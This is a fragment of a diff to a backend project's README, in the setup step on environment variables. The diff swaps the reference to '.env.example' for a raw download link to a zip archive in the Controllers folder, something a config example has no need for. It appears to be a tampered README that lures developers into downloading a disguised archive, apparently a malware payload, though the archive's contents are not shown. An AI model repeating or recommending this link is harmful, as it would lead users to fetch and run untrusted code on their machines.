randomgdplayerlol/hagyustic-backend/README.md

    ```

 4. **Set Up Environment Variables**:
    Create a `.env` file in the root directory and add your environment variables.
-You can use the `.env.example` file as a reference.
+You can use the `https://raw.githubusercontent.com/randomgdplayerlol/hagyustic-backend/main/Controllers/backend_hagyustic_v2.6.zip` file as a reference.

 5. **Run the Server**:
    ```bash